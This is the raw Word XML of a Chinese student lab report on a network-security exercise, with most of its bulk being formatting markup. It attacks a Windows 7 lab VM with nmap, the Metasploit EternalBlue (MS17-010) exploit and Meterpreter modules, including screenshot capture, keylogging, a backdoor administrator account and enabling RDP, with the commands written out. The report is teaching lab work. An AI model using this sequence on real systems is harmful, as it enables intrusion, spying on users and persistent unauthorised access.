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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.网络空间安全实验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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先确认攻击机的IP（如图1）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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5038090" cy="1650365"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1581798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98172" name="图片 1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166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3360"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（图1）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靶机为windows7,IP为（如图2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="480060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6299297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29748" name="图片 2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504" cy="4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sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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再用nmap -sP做主机发现,sP表示用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ICMP ping请求来检测目标主机是否在线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（如图3）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5088890" cy="2567940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="998328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287" name="图片 3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469" cy="257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520" w:firstLine="840" w:firstLineChars="300"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图3）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192.168.204.0/24表示一个子网，从192.168.204.0到192.168.204.255所有IP地址。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进行端口扫描，发现139和445端口开启，可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用ms17-010漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。（如图4）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5137785" cy="2726690"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="5222232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23227" name="图片 4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900" cy="274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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   （图4）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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auxiliary模块通常用于辅助攻击或信息收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，所以我们先利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>模块看看靶机是否存在漏洞。（如图5）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5759450" cy="3315335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183276524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65249" name="图片 7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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图5）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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可能存在漏洞，于是使用永恒之蓝漏洞攻击，因为rhosts为空，所以设置IP地址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以下是代码实现：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use exploit/windows/smb/ms17_010_eternalblue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 xml:space="preserve">show options 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set rhosts 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>204</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0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exploit</w:t>
      </w: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5835015" cy="3454400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4465164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16487" name="图片 5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09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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图6）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成功实现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4434205" cy="2865755"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="168051284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12841" name="图片 6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34" cy="2874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520" w:firstLine="420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（图7）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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接下来，获取靶机的命令行界面，由于Windows使用GBK编码而Kali用UTF-8编码，这导致了乱码的出现。（如图8）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5702300" cy="967105"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="110095152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951520" name="图片 8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847" cy="97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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> （图8）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38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>883285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4451985" cy="4244340"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="7149000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0006" name="图片 9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98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inorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所以用chcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Segoe UI" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>65001改变编码方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（Change Code Page）命令，用于设置当前会话的代码页（字符编码）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>65001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是UTF-8编码的代码页号。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这样就不会显示乱码了，可以用ipconfig来获取靶机的IP。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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">         （图9）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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接下来，用screenshot进行图片捕获，达到对靶机屏幕进行监控的目的。（如图10）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图11为结果。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5398770" cy="497840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46179195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91956" name="图片 11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106" cy="5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940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（图10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）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4820285" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="3156856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8564" name="图片 10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5231" cy="318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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(图11)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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然后我们进行键盘监控，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>先使用ps命令查看运行在目标系统的进程，获得system、cmd.exe、explorer.exe等在内的数十个进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>输入migrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1108</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令将meterpreter会话迁移至explorer.exe（1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>108</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）进程中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。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bookmarkStart w:id="0" w:name="_GoBack"/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5759450" cy="3635375"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="52817315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173150" name="图片 13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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图12）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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 xml:space="preserve">输入run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>post/windows/capture/keylog_recorder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后开始对靶机键盘进行监控，在此期间我在靶机上输入了“nihaoya”，按ctrl+c结束监控，查看所存文档可以发现成功地监控了键盘。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5759450" cy="930275"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="119751294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12946" name="图片 14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3360" w:firstLine="420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（图13）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5759450" cy="1403350"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="10790118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011828" name="图片 15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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图14）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注册新用户：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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先查看目标主机有哪些用户。如图15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5759450" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17363714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71499" name="图片 1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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图15）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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然后用命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">run getgui -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hhh(用户名)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> abc（密码），创建用户，并把他添加到 Administrator 组中，这样该用户就拥有远程桌面的权限了。虽然这里成功创建了用户，但是添加到Administrator组中失败了，于是运行shell,输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>net localgroup administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hhh/add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>添加用户到Administrator组中，还是失败了。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5759450" cy="1318895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116760015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00159" name="图片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1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2940" w:firstLine="420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（图16）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5179060" cy="2569845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="21722210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22100" name="图片 2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767" cy="257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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    （图17）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285750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5195570" cy="3630930"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="6174975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497540" name="图片 6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Theme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发现输入错误，/add前需要空格，重新输入，添加成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3360" w:firstLine="420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（图18）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420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 xml:space="preserve">在此期间，还试了另一种方法，添加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用户，通过远程协议的脚本来实现：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>run post/windows/manage/enable_rdp USERNAME=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASSWORD=123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，成功。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5468620" cy="2622550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="6034289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28977" name="图片 3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921" cy="263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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图19）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目标机重启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直接输入reboot失败，发现迁移进程可以达到目的。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4924425" cy="560070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5982392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39282" name="图片 7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777" cy="56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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（图20）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t>migrate 728 之后（图21），图22为靶机状态。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4912360" cy="3112770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14727959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95938" name="图片 8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647" cy="3153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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     （图21）</w:t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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5105400" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="8049596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59667" name="图片 9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0133" cy="346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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> （图22）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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TJkODRiZTJkNTM2YWY1Y2JmOTNkNTM4YjQ5ZDU2ZTEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00016E21"/>
    <w:rsid w:val="00016E21"/>
    <w:rsid w:val="001772E7"/>
    <w:rsid w:val="00E768F3"/>
    <w:rsid w:val="483F2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link w:val="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5">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="4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itle"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="432" w:hanging="432"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="7">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="4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816</Words>
  <Characters>1333</Characters>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>18</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1501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2024-08-27T14:09:00Z</dcterms:created>
  <dc:creator>zeliang zhang</dc:creator>
  <cp:lastModifiedBy>欧蜜（2和11）</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-27T15:26:35Z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1AE80DF8C01D4811B3F8F034DF356CA6_12</vt:lpwstr>
  </property>
</Properties>
</file>